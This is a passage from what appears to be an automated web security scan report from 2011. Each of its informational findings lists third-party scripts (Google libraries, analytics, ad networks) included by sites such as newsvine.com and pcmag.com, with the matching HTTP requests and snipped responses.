Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:02:03 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Keep-Alive: timeout=3, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 56108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/utilities/utilities.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/datasource/datasource-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/button/button-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/history/history-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/json/json-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/resize/resize-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.527. https://www.newsvine.com/_nv/accounts/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/login

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/autocomplete/autocomplete-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/button/button-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/cookie/cookie-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/datasource/datasource-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/history/history-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/json/json-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/menu/menu-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/resize/resize-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/selector/selector-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/utilities/utilities.js
https://ajax.googleapis.com/ajax/libs/yui/2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /_nv/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:58:45 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=f8216a56010cce7056bb2bebc2b8ea2f; expires=Sat, 25-Jan-2031 01:58:45 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 10103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/utilities/utilities.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/datasource/datasource-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/button/button-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/history/history-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/json/json-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/resize/resize-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.528. https://www.newsvine.com/_nv/accounts/msnbc/newsletters previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/msnbc/newsletters

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/autocomplete/autocomplete-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/button/button-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/cookie/cookie-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/datasource/datasource-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/history/history-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/json/json-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/menu/menu-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/resize/resize-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/selector/selector-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/utilities/utilities.js
https://ajax.googleapis.com/ajax/libs/yui/2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /_nv/accounts/msnbc/newsletters HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:23:00 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=612c76b17edbcde9ea20fe784e8a625d; expires=Sat, 25-Jan-2031 01:23:00 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/utilities/utilities.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/datasource/datasource-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/button/button-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/history/history-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/json/json-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/resize/resize-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0/build/event-delegate/event-delegate-min.js"></script>
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://www.msnbc.redacted/default.ashx/id/36009898#msnbc.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.529. https://www.newsvine.com/_nv/accounts/register previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/register

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/autocomplete/autocomplete-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/button/button-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/cookie/cookie-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/datasource/datasource-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/history/history-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/json/json-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/menu/menu-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/resize/resize-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/selector/selector-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/utilities/utilities.js
https://ajax.googleapis.com/ajax/libs/yui/2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /_nv/accounts/register HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:53 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=209e83103b98465a328a2c9ac4b644ca; expires=Sat, 25-Jan-2031 01:22:53 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 11769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/utilities/utilities.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/datasource/datasource-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/button/button-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/history/history-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/json/json-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/resize/resize-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/yui/2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.530. http://www.opensource.org/licenses/gpl-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/gpl-license.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.531. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outblush.com
Path:	/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.redacted\|msn.com/wonderwall\|v14.msn.com/\|preview.redacted/\|www.redacted/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The response dynamically includes the following script from another domain:

http://outblushcom.skimlinks.com/api/skimlinks.js

Request

Response

23.533. http://www.outofthecradle.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outofthecradle.net
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://103bees.com/bees/?bee=2441&fid=3107
http://ja.revolvermaps.com/m.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.outofthecradle.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:15:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.outofthecradle.net/WordPress/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 185940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>    <meta name="verify-v1" conten
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<CENTER>
<script type="text/javascript" src="http://ja.revolvermaps.com/m.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</body>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...

<script type="text/javascript" src="http://103bees.com/bees/?bee=2441&fid=3107"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pcmag.com
Path:	/&\|http:/www.pcmag.com/reviews\|http:/www.pcmag.com/category2/0,2806,24,00.asp\|http:/www.pcmag.com/category2/0,2806,9,00.asp\|http:/www.pcmag.com/category2/0,2806,4829,00.asp\|http:/www.pcmag.com/category2/0,2806,2201,00.asp\|office.microsoft.com\|www.healthline.com/$\|http:/www.terra.com.mx/default.htm\|http:/www.terra.com/$\|www.people.com/$\|http:/www.walmart.com/\|http:/www.walmart.com/cp/toys/4171\|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.yieldmanager.com/pixel?id=121665&id=70017&t=1
http://common.ziffdavisinternet.com/js/s_code_remote.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.ziffdavis.com/js/betrad.js

Request

GET /&|http:/www.pcmag.com/reviews|http:/www.pcmag.com/category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.pcmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 130460
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sun, 30 Jan 2011 02:00:56 GMT
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
X-Powered-By: ASP.NET
Expires: Sun, 30 Jan 2011 02:01:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 30 Jan 2011 02:01:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

...[SNIP]...
</script>

<script language="JavaScript" src="http://common.ziffdavisinternet.com/js/s_code_remote.js"></script>
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.ziffdavis.com/js/betrad.js" type="text/javascript"></script>
...[SNIP]...
<div id="microAd">
<script src="http://ad.yieldmanager.com/pixel?id=121665&id=70017&t=1" type="text/javascript"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pcmag.com
Path:	/category2/0,2806,2201,00.asp\|office.microsoft.com\|www.healthline.com/$\|http:/www.terra.com.mx/default.htm\|http:/www.terra.com/$\|www.people.com/$\|http:/www.walmart.com/\|http:/www.walmart.com/cp/toys/4171\|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.yieldmanager.com/pixel?id=121665&id=70017&t=1
http://common.ziffdavisinternet.com/js/s_code_remote.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.ziffdavis.com/js/betrad.js

Request

GET /category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.pcmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: private, max-age=2997
Date: Sun, 30 Jan 2011 02:01:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

...[SNIP]...
</script>

<script language="JavaScript" src="http://common.ziffdavisinternet.com/js/s_code_remote.js"></script>
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.ziffdavis.com/js/betrad.js" type="text/javascript"></script>
...[SNIP]...
<div id="microAd">
<script src="http://ad.yieldmanager.com/pixel?id=121665&id=70017&t=1" type="text/javascript"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pcmag.com
Path:	/category2/0,2806,24,00.asp\|http:/www.pcmag.com/category2/0,2806,9,00.asp\|http:/www.pcmag.com/category2/0,2806,4829,00.asp\|http:/www.pcmag.com/category2/0,2806,2201,00.asp\|office.microsoft.com\|www.healthline.com/$\|http:/www.terra.com.mx/default.htm\|http:/www.terra.com/$\|www.people.com/$\|http:/www.walmart.com/\|http:/www.walmart.com/cp/toys/4171\|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.yieldmanager.com/pixel?id=121665&id=70017&t=1
http://common.ziffdavisinternet.com/js/s_code_remote.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.ziffdavis.com/js/betrad.js

Request

GET /category2/0,2806,24,00.asp|http:/www.pcmag.com/category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.pcmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: p3
Content-Type: text/html
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: private, max-age=3135
Date: Sun, 30 Jan 2011 02:01:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

...[SNIP]...
</script>

<script language="JavaScript" src="http://common.ziffdavisinternet.com/js/s_code_remote.js"></script>
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.ziffdavis.com/js/betrad.js" type="text/javascript"></script>
...[SNIP]...
<div id="microAd">
<script src="http://ad.yieldmanager.com/pixel?id=121665&id=70017&t=1" type="text/javascript"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pcmag.com
Path:	/category2/0,2806,4829,00.asp\|http:/www.pcmag.com/category2/0,2806,2201,00.asp\|office.microsoft.com\|www.healthline.com/$\|http:/www.terra.com.mx/default.htm\|http:/www.terra.com/$\|www.people.com/$\|http:/www.walmart.com/\|http:/www.walmart.com/cp/toys/4171\|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.yieldmanager.com/pixel?id=121665&id=70017&t=1
http://common.ziffdavisinternet.com/js/s_code_remote.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.ziffdavis.com/js/betrad.js

Request

GET /category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.pcmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: p3
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sun, 30 Jan 2011 01:53:02 GMT
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
X-Powered-By: ASP.NET
Cache-Control: public, max-age=0
Expires: Sun, 30 Jan 2011 02:01:16 GMT
Date: Sun, 30 Jan 2011 02:01:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

...[SNIP]...
</script>

<script language="JavaScript" src="http://common.ziffdavisinternet.com/js/s_code_remote.js"></script>
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.ziffdavis.com/js/betrad.js" type="text/javascript"></script>
...[SNIP]...
<div id="microAd">
<script src="http://ad.yieldmanager.com/pixel?id=121665&id=70017&t=1" type="text/javascript"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pcmag.com
Path:	/category2/0,2806,9,00.asp\|http:/www.pcmag.com/category2/0,2806,4829,00.asp\|http:/www.pcmag.com/category2/0,2806,2201,00.asp\|office.microsoft.com\|www.healthline.com/$\|http:/www.terra.com.mx/default.htm\|http:/www.terra.com/$\|www.people.com/$\|http:/www.walmart.com/\|http:/www.walmart.com/cp/toys/4171\|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.yieldmanager.com/pixel?id=121665&id=70017&t=1
http://common.ziffdavisinternet.com/js/s_code_remote.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.ziffdavis.com/js/betrad.js

Request

GET /category2/0,2806,9,00.asp|http:/www.pcmag.com/category2/0,2806,4829,00.asp|http:/www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http:/www.terra.com.mx/default.htm|http:/www.terra.com/$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.pcmag.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: private, max-age=3012
Date: Sun, 30 Jan 2011 02:01:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

...[SNIP]...
</script>

<script language="JavaScript" src="http://common.ziffdavisinternet.com/js/s_code_remote.js"></script>
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

